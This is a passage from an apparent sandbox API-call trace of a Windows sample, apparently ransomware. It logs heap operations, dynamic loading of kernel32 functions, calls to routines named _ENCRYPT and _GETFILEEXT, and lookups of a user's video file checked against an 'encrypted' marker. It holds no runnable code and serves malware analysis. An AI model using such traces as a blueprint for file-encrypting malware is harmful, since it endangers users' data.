(in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0042.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0042.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0042.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0042.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0042.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0042.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0042.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0042.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0042.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0042.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0042.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0042.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0042.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0042.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0042.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0042.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0042.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0042.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0042.936] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0042.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0042.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0042.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0042.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0042.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0042.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0042.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0042.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0042.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0042.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0042.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0042.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0042.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0042.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0042.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0042.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0042.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0042.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0042.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0042.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0042.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0042.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0042.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0042.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0042.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0042.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0042.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0042.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0042.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0042.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0042.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0042.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0042.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0042.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0042.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0042.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0042.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0042.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.937] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0042.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0042.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0042.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0042.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0042.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0042.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0042.938] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0042.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0042.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0042.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0042.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0042.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0042.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0042.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0042.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0042.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0042.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0042.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0042.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0042.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0042.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0042.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0042.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0042.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0042.939] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0042.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0042.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0042.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0042.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0042.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0042.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0042.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0042.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0042.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0042.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0042.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0042.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0042.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0042.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.939] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0042.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0042.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8896a0 [0042.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x8896a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0042.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0042.940] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0042.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0042.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0042.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0042.940] CloseHandle (hObject=0x140) returned 1 [0042.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0042.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0042.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0042.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0042.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0042.940] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0042.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0042.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0042.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0042.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0042.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0042.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0042.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0042.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0042.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0042.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0042.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0042.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0042.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0042.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0042.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.941] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0042.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0042.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0042.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0042.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0042.941] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.941] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0042.941] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.941] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0042.941] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0042.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0042.941] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.942] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.942] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.942] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1c70ab0, ftCreationTime.dwHighDateTime=0x1d5c0af, ftLastAccessTime.dwLowDateTime=0x72ef5940, ftLastAccessTime.dwHighDateTime=0x1d5c503, ftLastWriteTime.dwLowDateTime=0x72ef5940, ftLastWriteTime.dwHighDateTime=0x1d5c503, nFileSizeHigh=0x0, nFileSizeLow=0x182dc, dwReserved0=0x0, dwReserved1=0x777648, cFileName="ejDsspxAB.mkv", cAlternateFileName="EJDSSP~1.MKV")) returned 0x7c20c0 [0042.942] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0042.942] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.942] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1c70ab0, ftCreationTime.dwHighDateTime=0x1d5c0af, ftLastAccessTime.dwLowDateTime=0x72ef5940, ftLastAccessTime.dwHighDateTime=0x1d5c503, ftLastWriteTime.dwLowDateTime=0x72ef5940, ftLastWriteTime.dwHighDateTime=0x1d5c503, nFileSizeHigh=0x0, nFileSizeLow=0x182dc, dwReserved0=0x0, dwReserved1=0x777648, cFileName="ejDsspxAB.mkv", cAlternateFileName="EJDSSP~1.MKV")) returned 0x7c20c0 [0042.942] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0042.942] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS 